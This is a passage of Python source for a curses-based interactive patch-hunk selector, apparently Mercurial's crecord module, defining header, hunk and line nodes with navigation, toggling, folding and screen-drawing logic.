raise NotImplementedError("method must be implemented by subclass")
def nextitem(self, skipfolded=True):
"""
Try to return the next item closest to this item, regardless of item's
type (header, hunk, or hunkline).
If skipfolded == True, and the current item is folded, then the child
items that are hidden due to folding will be skipped when determining
the next item.
If it is not possible to get the next item, return None.
"""
try:
itemfolded = self.folded
except AttributeError:
itemfolded = False
if skipfolded and itemfolded:
nextitem = self.nextsibling()
if nextitem is None:
try:
nextitem = self.parentitem().nextsibling()
except AttributeError:
nextitem = None
return nextitem
else:
# try child
item = self.firstchild()
if item is not None:
return item
# else try next sibling
item = self.nextsibling()
if item is not None:
return item
try:
# else try parent's next sibling
item = self.parentitem().nextsibling()
if item is not None:
return item
# else return grandparent's next sibling (or None)
return self.parentitem().parentitem().nextsibling()
except AttributeError: # parent and/or grandparent was None
return None
def previtem(self):
"""
Try to return the previous item closest to this item, regardless of
item's type (header, hunk, or hunkline).
If it is not possible to get the previous item, return None.
"""
# try previous sibling's last child's last child,
# else try previous sibling's last child, else try previous sibling
prevsibling = self.prevsibling()
if prevsibling is not None:
prevsiblinglastchild = prevsibling.lastchild()
if (prevsiblinglastchild is not None) and not prevsibling.folded:
prevsiblinglclc = prevsiblinglastchild.lastchild()
if (prevsiblinglclc is not None) and not prevsiblinglastchild.folded:
return prevsiblinglclc
else:
return prevsiblinglastchild
else:
return prevsibling
# try parent (or None)
return self.parentitem()
class patch(patchnode, list): # todo: rename patchroot
"""
list of header objects representing the patch.
"""
def __init__(self, headerlist):
self.extend(headerlist)
# add parent patch object reference to each header
for header in self:
header.patch = self
class uiheader(patchnode):
"""patch header
xxx shouldn't we move this to mercurial/patch.py ?
"""
def __init__(self, header):
self.nonuiheader = header
# flag to indicate whether to apply this chunk
self.applied = True
# flag which only affects the status display indicating if a node's
# children are partially applied (i.e. some applied, some not).
self.partial = False
# flag to indicate whether to display as folded/unfolded to user
self.folded = True
# list of all headers in patch
self.patch = None
# flag is False if this header was ever unfolded from initial state
self.neverunfolded = True
self.hunks = [uihunk(h, self) for h in self.hunks]
def prettystr(self):
x = stringio()
self.pretty(x)
return x.getvalue()
def nextsibling(self):
numheadersinpatch = len(self.patch)
indexofthisheader = self.patch.index(self)
if indexofthisheader < numheadersinpatch - 1:
nextheader = self.patch[indexofthisheader + 1]
return nextheader
else:
return None
def prevsibling(self):
indexofthisheader = self.patch.index(self)
if indexofthisheader > 0:
previousheader = self.patch[indexofthisheader - 1]
return previousheader
else:
return None
def parentitem(self):
"""
there is no 'real' parent item of a header that can be selected,
so return None.
"""
return None
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
if len(self.hunks) > 0:
return self.hunks[0]
else:
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
if len(self.hunks) > 0:
return self.hunks[-1]
else:
return None
def allchildren(self):
"return a list of all of the direct children of this node"
return self.hunks
def __getattr__(self, name):
return getattr(self.nonuiheader, name)
class uihunkline(patchnode):
"represents a changed line in a hunk"
def __init__(self, linetext, hunk):
self.linetext = linetext
self.applied = True
# the parent hunk to which this line belongs
self.hunk = hunk
# folding lines currently is not used/needed, but this flag is needed
# in the previtem method.
self.folded = False
def prettystr(self):
return self.linetext
def nextsibling(self):
numlinesinhunk = len(self.hunk.changedlines)
indexofthisline = self.hunk.changedlines.index(self)
if indexofthisline < numlinesinhunk - 1:
nextline = self.hunk.changedlines[indexofthisline + 1]
return nextline
else:
return None
def prevsibling(self):
indexofthisline = self.hunk.changedlines.index(self)
if indexofthisline > 0:
previousline = self.hunk.changedlines[indexofthisline - 1]
return previousline
else:
return None
def parentitem(self):
"return the parent to the current item"
return self.hunk
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
# hunk-lines don't have children
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
# hunk-lines don't have children
return None
class uihunk(patchnode):
"""ui patch hunk, wraps a hunk and keep track of ui behavior"""
maxcontext = 3
def __init__(self, hunk, header):
self._hunk = hunk
self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
self.header = header
# used at end for detecting how many removed lines were un-applied
self.originalremoved = self.removed
# flag to indicate whether to display as folded/unfolded to user
self.folded = True
# flag to indicate whether to apply this chunk
self.applied = True
# flag which only affects the status display indicating if a node's
# children are partially applied (i.e. some applied, some not).
self.partial = False
def nextsibling(self):
numhunksinheader = len(self.header.hunks)
indexofthishunk = self.header.hunks.index(self)
if indexofthishunk < numhunksinheader - 1:
nexthunk = self.header.hunks[indexofthishunk + 1]
return nexthunk
else:
return None
def prevsibling(self):
indexofthishunk = self.header.hunks.index(self)
if indexofthishunk > 0:
previoushunk = self.header.hunks[indexofthishunk - 1]
return previoushunk
else:
return None
def parentitem(self):
"return the parent to the current item"
return self.header
def firstchild(self):
"return the first child of this item, if one exists. otherwise None."
if len(self.changedlines) > 0:
return self.changedlines[0]
else:
return None
def lastchild(self):
"return the last child of this item, if one exists. otherwise None."
if len(self.changedlines) > 0:
return self.changedlines[-1]
else:
return None
def allchildren(self):
"return a list of all of the direct children of this node"
return self.changedlines
def countchanges(self):
"""changedlines -> (n+,n-)"""
add = sum(
1 for l in self.changedlines if l.applied and l.prettystr().startswith(b"+")
)
rem = sum(
1 for l in self.changedlines if l.applied and l.prettystr().startswith(b"-")
)
return add, rem
def getfromtoline(self):
# calculate the number of removed lines converted to context lines
removedconvertedtocontext = self.originalremoved - self.removed
contextlen = len(self.before) + len(self.after) + removedconvertedtocontext
if self.after and self.after[-1] == b"\\ No newline at end of file\n":
contextlen -= 1
fromlen = contextlen + self.removed
tolen = contextlen + self.added
# diffutils manual, section "2.2.2.2 detailed description of unified
# format": "an empty hunk is considered to end at the line that
# precedes the hunk."
#
# so, if either of hunks is empty, decrease its line start. --immerrr
# but only do this if fromline > 0, to avoid having, e.g fromline=-1.
fromline, toline = self.fromline, self.toline
if fromline != 0:
if fromlen == 0:
fromline -= 1
if tolen == 0 and toline > 0:
toline -= 1
fromtoline = b"@@ -%d,%d +%d,%d @@%s\n" % (
fromline,
fromlen,
toline,
tolen,
self.proc and (b" " + self.proc),
)
return fromtoline
def write(self, fp):
# updated self.added/removed, which are used by getfromtoline()
self.added, self.removed = self.countchanges()
fp.write(self.getfromtoline())
hunklinelist = []
# add the following to the list: (1) all applied lines, and
# (2) all unapplied removal lines (convert these to context lines)
for changedline in self.changedlines:
changedlinestr = changedline.prettystr()
if changedline.applied:
hunklinelist.append(changedlinestr)
elif changedlinestr[0:1] == b"-":
hunklinelist.append(b" " + changedlinestr[1:])
fp.write(b"".join(self.before + hunklinelist + self.after))
pretty = write
def prettystr(self):
x = stringio()
self.pretty(x)
return x.getvalue()
def reversehunk(self):
"""return a recordhunk which is the reverse of the hunk
Assuming the displayed patch is diff(A, B) result. The returned hunk is
intended to be applied to B, instead of A.
For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
the user made the following selection:
0
[x] -1 [x]: selected
[ ] -2 [ ]: not selected
[x] +3
[ ] +4
[x] +5
6
This function returns a hunk like:
0
-3
-4
-5
+1
+4
6
Note "4" was first deleted then added. That's because "4" exists in B
side and "-4" must exist between "-3" and "-5" to make the patch
applicable to B.
"""
dels = []
adds = []
for line in self.changedlines:
text = line.linetext
if line.applied:
if text[0:1] == b"+":
dels.append(text[1:])
elif text[0:1] == b"-":
adds.append(text[1:])
elif text[0:1] == b"+":
dels.append(text[1:])
adds.append(text[1:])
hunk = [b"-%s" % l for l in dels] + [b"+%s" % l for l in adds]
h = self._hunk
return patchmod.recordhunk(
h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
)
def __getattr__(self, name):
return getattr(self._hunk, name)
def __repr__(self):
return "<hunk %r@%d>" % (self.filename(), self.fromline)
def filterpatch(ui, chunks, chunkselector, operation=None):
"""interactively filter patch chunks into applied-only chunks"""
chunks = list(chunks)
# convert chunks list into structure suitable for displaying/modifying
# with curses. create a list of headers only.
headers = [c for c in chunks if isinstance(c, patchmod.header)]
# if there are no changed files
if len(headers) == 0:
return [], {}
uiheaders = [uiheader(h) for h in headers]
# let user choose headers/hunks/lines, and mark their applied flags
# accordingly
ret = chunkselector(ui, uiheaders, operation=operation)
appliedhunklist = []
for hdr in uiheaders:
if hdr.applied and (
hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
):
appliedhunklist.append(hdr)
fixoffset = 0
for hnk in hdr.hunks:
if hnk.applied:
appliedhunklist.append(hnk)
# adjust the 'to'-line offset of the hunk to be correct
# after de-activating some of the other hunks for this file
if fixoffset:
# hnk = copy.copy(hnk) # necessary??
hnk.toline += fixoffset
else:
fixoffset += hnk.removed - hnk.added
return (appliedhunklist, ret)
def chunkselector(ui, headerlist, operation=None):
"""
curses interface to get selection of chunks, and mark the applied flags
of the chosen chunks.
"""
ui.write(_("starting interactive selection\n"))
chunkselector = curseschunkselector(headerlist, ui, operation)
origsigtstp = sentinel = object()
if util.safehasattr(signal, "SIGTSTP"):
origsigtstp = util.getsignal(signal.SIGTSTP)
try:
with progress.suspend(), util.traced("crecord", cat="blocked"):
curses.wrapper(chunkselector.main)
if chunkselector.initerr is not None:
hint = _(
"re-run with '--config ui.interface=text' to use the text interface"
)
raise error.Abort(chunkselector.initerr, hint=hint)
# ncurses does not restore signal handler for SIGTSTP
finally:
if origsigtstp is not sentinel:
util.signal(signal.SIGTSTP, origsigtstp)
return chunkselector.opts
def testdecorator(testfn, f):
def u(*args, **kwargs):
return f(testfn, *args, **kwargs)
return u
def testchunkselector(testfn, ui, headerlist, operation=None):
"""
test interface to get selection of chunks, and mark the applied flags
of the chosen chunks.
"""
chunkselector = curseschunkselector(headerlist, ui, operation)
if testfn and os.path.exists(testfn):
testf = open(testfn)
testcommands = [x.rstrip("\n") for x in testf.readlines()]
testf.close()
while True:
if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
break
return chunkselector.opts
_headermessages = { # {operation: text}
"apply": _("Select hunks to apply"),
"discard": _("Select hunks to discard"),
None: _("Select hunks to record"),
}
class curseschunkselector(object):
def __init__(self, headerlist, ui, operation=None):
# put the headers into a patch object
self.headerlist = patch(headerlist)
self.ui = ui
self.opts = {}
self.errorstr = None
# list of all chunks
self.chunklist = []
for h in headerlist:
self.chunklist.append(h)
self.chunklist.extend(h.hunks)
# dictionary mapping (fgcolor, bgcolor) pairs to the
# corresponding curses color-pair value.
self.colorpairs = {}
# maps custom nicknames of color-pairs to curses color-pair values
self.colorpairnames = {}
# the currently selected header, hunk, or hunk-line
self.currentselecteditem = self.headerlist[0]
# updated when printing out patch-display -- the 'lines' here are the
# line positions *in the pad*, not on the screen.
self.selecteditemstartline = 0
self.selecteditemendline = None
# define indentation levels
self.headerindentnumchars = 0
self.hunkindentnumchars = 3
self.hunklineindentnumchars = 6
# the first line of the pad to print to the screen
self.firstlineofpadtoprint = 0
# keeps track of the number of lines in the pad
self.numpadlines = None
self.numstatuslines = 1
# keep a running count of the number of lines printed to the pad
# (used for determining when the selected item begins/ends)
self.linesprintedtopadsofar = 0
# the first line of the pad which is visible on the screen
self.firstlineofpadtoprint = 0
# stores optional text for a commit comment provided by the user
self.commenttext = ""
# if the last 'toggle all' command caused all changes to be applied
self.waslasttoggleallapplied = True
# affects some ui text
if operation not in _headermessages:
raise error.ProgrammingError("unexpected operation: %s" % operation)
self.operation = operation
def uparrowevent(self):
"""
try to select the previous item to the current item that has the
most-indented level. for example, if a hunk is selected, try to select
the last hunkline of the hunk prior to the selected hunk. or, if
the first hunkline of a hunk is currently selected, then select the
hunk itself.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.previtem()
if nextitem is None:
# if no parent item (i.e. currentitem is the first header), then
# no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def uparrowshiftevent(self):
"""
select (if possible) the previous item on the same level as the
currently selected item. otherwise, select (if possible) the
parent-item of the currently selected item.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.prevsibling()
# if there's no previous sibling, try choosing the parent
if nextitem is None:
nextitem = currentitem.parentitem()
if nextitem is None:
# if no parent item (i.e. currentitem is the first header), then
# no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def downarrowevent(self):
"""
try to select the next item to the current item that has the
most-indented level. for example, if a hunk is selected, select
the first hunkline of the selected hunk. or, if the last hunkline of
a hunk is currently selected, then select the next hunk, if one exists,
or if not, the next header if one exists.
"""
# self.startprintline += 1 #debug
currentitem = self.currentselecteditem
nextitem = currentitem.nextitem()
# if there's no next item, keep the selection as-is
if nextitem is None:
nextitem = currentitem
self.currentselecteditem = nextitem
def downarrowshiftevent(self):
"""
select (if possible) the next item on the same level as the currently
selected item. otherwise, select (if possible) the next item on the
same level as the parent item of the currently selected item.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.nextsibling()
# if there's no next sibling, try choosing the parent's nextsibling
if nextitem is None:
try:
nextitem = currentitem.parentitem().nextsibling()
except AttributeError:
# parentitem returned None, so nextsibling() can't be called
nextitem = None
if nextitem is None:
# if parent has no next sibling, then no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def rightarrowevent(self):
"""
select (if possible) the first of this item's child-items.
"""
currentitem = self.currentselecteditem
nextitem = currentitem.firstchild()
# turn off folding if we want to show a child-item
if currentitem.folded:
self.togglefolded(currentitem)
if nextitem is None:
# if no next item on parent-level, then no change...
nextitem = currentitem
self.currentselecteditem = nextitem
def leftarrowevent(self):
"""
if the current item can be folded (i.e. it is an unfolded header or
hunk), then fold it. otherwise try select (if possible) the parent
of this item.
"""
currentitem = self.currentselecteditem
# try to fold the item
if not isinstance(currentitem, uihunkline):
if not currentitem.folded:
self.togglefolded(item=currentitem)
return
# if it can't be folded, try to select the parent item
nextitem = currentitem.parentitem()
if nextitem is None:
# if no item on parent-level, then no change...
nextitem = currentitem
if not nextitem.folded:
self.togglefolded(item=nextitem)
self.currentselecteditem = nextitem
def leftarrowshiftevent(self):
"""
select the header of the current item (or fold current item if the
current item is already a header).
"""
currentitem = self.currentselecteditem
if isinstance(currentitem, uiheader):
if not currentitem.folded:
self.togglefolded(item=currentitem)
return
# select the parent item recursively until we're at a header
while True:
nextitem = currentitem.parentitem()
if nextitem is None:
break
else:
currentitem = nextitem
self.currentselecteditem = currentitem
def updatescroll(self):
"scroll the screen to fully show the currently-selected"
selstart = self.selecteditemstartline
selend = self.selecteditemendline
padstart = self.firstlineofpadtoprint
padend = padstart + self.yscreensize - self.numstatuslines - 1
# 'buffered' pad start/end values which scroll with a certain
# top/bottom context margin
padstartbuffered = padstart + 3
padendbuffered = padend - 3
if selend > padendbuffered:
self.scrolllines(selend - padendbuffered)
elif selstart < padstartbuffered:
# negative values scroll in pgup direction
self.scrolllines(selstart - padstartbuffered)
def scrolllines(self, numlines):
"scroll the screen up (down) by numlines when numlines >0 (<0)."
self.firstlineofpadtoprint += numlines
if self.firstlineofpadtoprint < 0:
self.firstlineofpadtoprint = 0
if self.firstlineofpadtoprint > self.numpadlines - 1:
self.firstlineofpadtoprint = self.numpadlines - 1
def toggleapply(self, item=None):
"""
toggle the applied flag of the specified item. if no item is specified,
toggle the flag of the currently selected item.
"""
if item is None:
item = self.currentselecteditem
item.applied = not item.applied
if isinstance(item, uiheader):
item.partial = False
if item.applied:
# apply all its hunks
for hnk in item.hunks:
hnk.applied = True
# apply all their hunklines
for hunkline in hnk.changedlines:
hunkline.applied = True
else:
# un-apply all its hunks
for hnk in item.hunks:
hnk.applied = False
hnk.partial = False
# un-apply all their hunklines
for hunkline in hnk.changedlines:
hunkline.applied = False
elif isinstance(item, uihunk):
item.partial = False
# apply all it's hunklines
for hunkline in item.changedlines:
hunkline.applied = item.applied
siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
allsiblingsapplied = not (False in siblingappliedstatus)
nosiblingsapplied = not (True in siblingappliedstatus)
siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
somesiblingspartial = True in siblingspartialstatus
# cases where applied or partial should be removed from header
# if no 'sibling' hunks are applied (including this hunk)
if nosiblingsapplied:
if not item.header.special():
item.header.applied = False
item.header.partial = False
else: # some/all parent siblings are applied
item.header.applied = True
item.header.partial = somesiblingspartial or not allsiblingsapplied
elif isinstance(item, uihunkline):
siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
allsiblingsapplied = not (False in siblingappliedstatus)
nosiblingsapplied = not (True in siblingappliedstatus)
# if no 'sibling' lines are applied
if nosiblingsapplied:
item.hunk.applied = False
item.hunk.partial = False
elif allsiblingsapplied:
item.hunk.applied = True
item.hunk.partial = False
else: # some siblings applied
item.hunk.applied = True
item.hunk.partial = True
parentsiblingsapplied = [hnk.applied for hnk in item.hunk.header.hunks]
noparentsiblingsapplied = not (True in parentsiblingsapplied)
allparentsiblingsapplied = not (False in parentsiblingsapplied)
parentsiblingspartial = [hnk.partial for hnk in item.hunk.header.hunks]
someparentsiblingspartial = True in parentsiblingspartial
# if all parent hunks are not applied, un-apply header
if noparentsiblingsapplied:
if not item.hunk.header.special():
item.hunk.header.applied = False
item.hunk.header.partial = False
# set the applied and partial status of the header if needed
else: # some/all parent siblings are applied
item.hunk.header.applied = True
item.hunk.header.partial = (
someparentsiblingspartial or not allparentsiblingsapplied
)
def toggleall(self):
"toggle the applied flag of all items."
if self.waslasttoggleallapplied: # then unapply them this time
for item in self.headerlist:
if item.applied:
self.toggleapply(item)
else:
for item in self.headerlist:
if not item.applied:
self.toggleapply(item)
self.waslasttoggleallapplied = not self.waslasttoggleallapplied
def togglefolded(self, item=None, foldparent=False):
"toggle folded flag of specified item (defaults to currently selected)"
if item is None:
item = self.currentselecteditem
if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
if not isinstance(item, uiheader):
# we need to select the parent item in this case
self.currentselecteditem = item = item.parentitem()
elif item.neverunfolded:
item.neverunfolded = False
# also fold any foldable children of the parent/current item
if isinstance(item, uiheader): # the original or 'new' item
for child in item.allchildren():
child.folded = not item.folded
if isinstance(item, (uiheader, uihunk)):
item.folded = not item.folded
def alignstring(self, instr, window):
"""
add whitespace to the end of a string in order to make it fill
the screen in the x direction. the current cursor position is
taken into account when making this calculation. the string can span
multiple lines.
"""
y, xstart = window.getyx()
width = self.xscreensize
# turn tabs into spaces
instr = instr.expandtabs(4)
strwidth = encoding.colwidth(pycompat.decodeutf8(instr, errors="replace"))
numspaces = width - ((strwidth + xstart) % width) - 1
return instr + b" " * numspaces + b"\n"
def printstring(
self,
window,
text,
fgcolor=None,
bgcolor=None,
pair=None,
pairname=None,
attrlist=None,
towin=True,
align=True,
showwhtspc=False,
):
"""
print the string, text, with the specified colors and attributes, to
the specified curses window object.
the foreground and background colors are of the form
curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
magenta, red, white, yellow]. if pairname is provided, a color
pair will be looked up in the self.colorpairnames dictionary.
attrlist is a list containing text attributes in the form of
curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
underline].
if align == True, whitespace is added to the printed string such that
the string stretches to the right border of the window.
if showwhtspc == True, trailing whitespace of a string is highlighted.
"""
# preprocess the text, converting tabs to spaces
text = text.expandtabs(4)
# strip \n, and convert control characters to ^[char] representation
text = text.strip(b"\n")
text = re.sub(
br"[\x00-\x08\x0a-\x1f]",
lambda m: b"^%s" % bytearray([ord(m.group()) + 64]),
text,
)
if pair is not None:
colorpair = pair
elif pairname is not None:
colorpair = self.colorpairnames[pairname]
else:
if fgcolor is None:
fgcolor = -1
if bgcolor is None:
bgcolor = -1
if (fgcolor, bgcolor) in self.colorpairs:
colorpair = self.colorpairs[(fgcolor, bgcolor)]
else:
colorpair = self.getcolorpair(fgcolor, bgcolor)
# add attributes if possible
if attrlist is None:
attrlist = []
if colorpair < 256:
# then it is safe to apply all attributes
for textattr in attrlist:
colorpair |= textattr
else:
# just apply a select few (safe?) attributes
for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
if textattr in attrlist:
colorpair |= textattr
y, xstart = self.chunkpad.getyx()
t = b"" # variable for counting lines printed
# if requested, show trailing whitespace
if showwhtspc:
origlen = len(text)
text = text.rstrip(b" \n") # tabs have already been expanded
strippedlen = len(text)
numtrailingspaces = origlen - strippedlen
if towin:
window.addstr(text, colorpair)
t += text
if showwhtspc:
wscolorpair = colorpair | curses.A_REVERSE
if towin:
for i in range(numtrailingspaces):
window.addch(curses.ACS_CKBOARD, wscolorpair)
t += b" " * numtrailingspaces
if align:
if towin:
extrawhitespace = self.alignstring(b"", window)
window.addstr(extrawhitespace, colorpair)
else:
# need to use t, since the x position hasn't incremented
extrawhitespace = self.alignstring(t, window)
t += extrawhitespace
# is reset to 0 at the beginning of printitem()
linesprinted = (xstart + len(t)) // self.xscreensize
self.linesprintedtopadsofar += linesprinted
return t
def _getstatuslinesegments(self):
"""-> [str]. return segments"""
selected = self.currentselecteditem.applied
spaceselect = _("space: select")
spacedeselect = _("space: deselect")
# Format the selected label into a place as long as the longer of the
# two possible labels. This may vary by language.
spacelen = max(len(spaceselect), len(spacedeselect))
selectedlabel = "%-*s" % (spacelen, spacedeselect if selected else spaceselect)
segments = [
_headermessages[self.operation],
"-",
_("[x]=selected **=collapsed"),
_("c: confirm"),
_("q: abort"),
_("arrow keys: move/expand/collapse"),
selectedlabel,
_("?: help"),
]
return segments
def _getstatuslines(self):
"""() -> [str]. return short help used in the top status window"""
if self.errorstr is not None:
lines = [self.errorstr, _("Press any key to continue")]
else:
# wrap segments to lines
segments = self._getstatuslinesegments()
width = self.xscreensize
lines = []
lastwidth = width
for s in segments:
w = encoding.colwidth(s)
sep = " " * (1 + (s and s[0] not in "-["))
if lastwidth + w + len(sep) >= width:
lines.append(s)
lastwidth = w
else:
lines[-1] += sep + s
lastwidth += w + len(sep)
if len(lines) != self.numstatuslines:
self.numstatuslines = len(lines)
self.statuswin.resize(self.numstatuslines, self.xscreensize)
return [util.ellipsis(l, self.xscreensize - 1) for l in lines]
def updatescreen(self):
self.statuswin.erase()
self.chunkpad.erase()
printstring = self.printstring
# print out the status lines at the top
try:
for line in self._getstatuslines():
printstring(
self.statuswin,
pycompat.encodeutf8(line),
pairname="legend",
attrlist=[curses.A_BOLD],
)
self.statuswin.refresh()
except curses.error:
pass
if self.errorstr is not None:
return
# print out the patch in the remaining part of the window
try:
self.printitem()
self.updatescroll()
self.chunkpad.refresh(
self.firstlineofpadtoprint,
0,
self.numstatuslines,
0,
self.yscreensize - self.numstatuslines,
max([self.xscreensize - 1, 0]),
)
except curses.error:
pass
def getstatusprefixstring(self, item):
"""
create a string to prefix a line with which indicates whether 'item'
is applied and/or folded.
"""
# create checkbox string
if item.applied:
if not isinstance(item, uihunkline) and item.partial:
checkbox = b"[~]"
else:
checkbox = b"[x]"
else:
checkbox = b"[ ]"
try:
if item.folded:
checkbox += b"**"
if isinstance(item, uiheader):
# one of "m", "a", or "d" (modified, added, deleted)
filestatus = item.changetype
checkbox += filestatus + b" "
else:
checkbox += b" "
if isinstance(item, uiheader):
# add two more spaces for headers
checkbox += b" "
except AttributeError: # not foldable
checkbox += b" "
return checkbox
def printheader(self, header, selected=False, towin=True, ignorefolding=False):
"""
print the header to the pad. if countlines is True, don't print
anything, but just count the number of lines which would be printed.
"""
outstr = b""
text = header.prettystr()
chunkindex = self.chunklist.index(header)
if chunkindex != 0 and not header.folded:
# add separating line before headers
outstr += self.printstring(
self.chunkpad, b"_" * self.xscreensize, towin=towin, align=False
)
# select color-pair based on if the header is selected
colorpair = self.getcolorpair(
name=selected and "selected" or "normal",
attrlist=selected and [curses.A_BOLD] or [],
)
# print out each line of the chunk, expanding it to screen width
# number of characters to indent lines on this level by
indentnumchars = 0
checkbox = self.getstatusprefixstring(header)
if not header.folded or ignorefolding:
textlist = text.split(b"\n")
linestr = checkbox + textlist[0]
else:
linestr = checkbox + pycompat.encodeutf8(header.filename())
outstr += self.printstring(self.chunkpad, linestr, pair=colorpair, towin=towin)
if not header.folded or ignorefolding:
if len(textlist) > 1:
for line in textlist[1:]:
linestr = b" " * (indentnumchars + len(checkbox)) + line
outstr += self.printstring(
self.chunkpad, linestr, pair=colorpair, towin=towin
)
return outstr
def printhunklinesbefore(
self, hunk, selected=False, towin=True, ignorefolding=False
):
"includes start/end line indicator"
outstr = b""
# where hunk is in list of siblings
hunkindex = hunk.header.hunks.index(hunk)
if hunkindex != 0:
# add separating line before headers
outstr += self.printstring(
self.chunkpad, b" " * self.xscreensize, towin=towin, align=False
)
colorpair = self.getcolorpair(
name=selected and "selected" or "hunk",
attrlist=selected and [curses.A_BOLD] or [],
)
# print out from-to line with checkbox
checkbox = self.getstatusprefixstring(hunk)
lineprefix = b" " * self.hunkindentnumchars + checkbox
frtoline = b" " + hunk.getfromtoline().strip(b"\n")
outstr += self.printstring(
self.chunkpad, lineprefix, towin=towin, align=False
) # add uncolored checkbox/indent
outstr += self.printstring(self.chunkpad, frtoline, pair=colorpair, towin=towin)
if hunk.folded and not ignorefolding:
# skip remainder of output
return outstr
# print out lines of the chunk preceeding changed-lines
for line in hunk.before:
linestr = b" " * (self.hunklineindentnumchars + len(checkbox)) + line
outstr += self.printstring(self.chunkpad, linestr, towin=towin)
return outstr
def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
outstr = b""
if hunk.folded and not ignorefolding:
return outstr
# a bit superfluous, but to avoid hard-coding indent amount
checkbox = self.getstatusprefixstring(hunk)
for line in hunk.after:
linestr = b" " * (self.hunklineindentnumchars + len(checkbox)) + line
outstr += self.printstring(self.chunkpad, linestr, towin=towin)
return outstr
def printhunkchangedline(self, hunkline, selected=False, towin=True):
outstr = b""
checkbox = self.getstatusprefixstring(hunkline)
linestr = hunkline.prettystr().strip(b"\n")
# select color-pair based on whether line is an addition/removal
if selected:
colorpair = self.getcolorpair(name="selected", attrlist=[curses.A_BOLD])
elif linestr.startswith(b"+"):
colorpair = self.getcolorpair(name="addition")
elif linestr.startswith(b"-"):
colorpair = self.getcolorpair(name="deletion")
elif linestr.startswith(b"\\"):
colorpair = self.getcolorpair(name="normal")
lineprefix = b" " * self.hunklineindentnumchars + checkbox
outstr += self.printstring(
self.chunkpad, lineprefix, towin=towin, align=False
) # add uncolored checkbox/indent
outstr += self.printstring(
self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
)
return outstr
def printitem(
self, item=None, ignorefolding=False, recursechildren=True, towin=True
):
"""
use __printitem() to print the the specified item.applied.
if item is not specified, then print the entire patch.
(hiding folded elements, etc. -- see __printitem() docstring)
"""
if item is None:
item = self.headerlist
if recursechildren:
self.linesprintedtopadsofar = 0
outstr = []
self.__printitem(item, ignorefolding, recursechildren, outstr, towin=towin)
return b"".join(outstr)
def outofdisplayedarea(self):
y, _ = self.chunkpad.getyx() # cursor location
# * 2 here works but an optimization would be the max number of
# consecutive non selectable lines
# i.e the max number of context line for any hunk in the patch
miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
maxy = self.firstlineofpadtoprint + self.yscreensize * 2
return y < miny or y > maxy
def handleselection(self, item, recursechildren):
selected = item is self.currentselecteditem
if selected and recursechildren:
# assumes line numbering starting from line 0
self.selecteditemstartline = self.linesprintedtopadsofar
selecteditemlines = self.getnumlinesdisplayed(item, recursechildren=False)
self.selecteditemendline = (
self.selecteditemstartline + selecteditemlines - 1
)
return selected
def __printitem(self, item, ignorefolding, recursechildren, outstr, towin=True):
"""
recursive method for printing out patch/header/hunk/hunk-line data to
screen. also returns a string with all of the content of the displayed
patch (not including coloring, etc.).
if ignorefolding is True, then folded items are printed out.
if recursechildren is False, then only print the item without its
child items.
"""
if towin and self.outofdisplayedarea():
return
selected = self.handleselection(item, recursechildren)
# patch object is a list of headers
if isinstance(item, patch):
if recursechildren:
for hdr in item:
self.__printitem(hdr, ignorefolding, recursechildren, outstr, towin)
# todo: eliminate all isinstance() calls
if isinstance(item, uiheader):
outstr.append(
self.printheader(
item, selected, towin=towin, ignorefolding=ignorefolding
)
)
if recursechildren:
for hnk in item.hunks:
self.__printitem(hnk, ignorefolding, recursechildren, outstr, towin)
elif isinstance(item, uihunk) and ((not item.header.folded) or ignorefolding):
# print the hunk data which comes before the changed-lines
outstr.append(
self.printhunklinesbefore(
item, selected, towin=towin, ignorefolding=ignorefolding
)
)
if recursechildren:
for l in item.changedlines:
self.__printitem(l, ignorefolding, recursechildren, outstr, towin)
outstr.append(
self.printhunklinesafter(
item, towin=towin, ignorefolding=ignorefolding
)
)
elif isinstance(item, uihunkline) and ((not item.hunk.folded) or ignorefolding):
outstr.append(self.printhunkchangedline(item, selected, towin=towin))
return outstr
def getnumlinesdisplayed(
self, item=None, ignorefolding=False, recursechildren=True
):
"""
return the number of lines which would be displayed if the item were
to be printed to the display. the item will not be printed to the
display (pad).
if no item is given, assume the entire patch.
if ignorefolding is True, folded items will be unfolded when counting
the number of lines.
"""
# temporarily disable printing to windows by printstring
patchdisplaystring = self.printitem(
item, ignorefolding, recursechildren, towin=False
)
numlines = len(patchdisplaystring) // self.xscreensize
return numlines
def sigwinchhandler(self, n, frame):
"handle window resizing"
try:
curses.endwin()
self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
self.statuswin.resize(self.numstatuslines, self.xscreensize)
self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
except curses.error:
pass
def getcolorpair(self, fgcolor=None, bgcolor=None, name=None, attrlist=None):
"""
get a curses color pair, adding it to self.colorpairs if it is not
already defined. an optional string, name, can be passed as a shortcut
for referring to the color-pair. by default, if no arguments are
specified, the white foreground / black background color-pair is
returned.
it is expected that this function will be used exclusively for
initializing color pairs, and not curses.init_pair().
attrlist is used to 'flavor' the returned color-pair. this information
is not stored in self.colorpairs. it contains attribute values like
curses.A_BOLD.
"""
if (name is not None) and name in self.colorpairnames:
# then get the associated color pair and return it
colorpair = self.colorpairnames[name]
else:
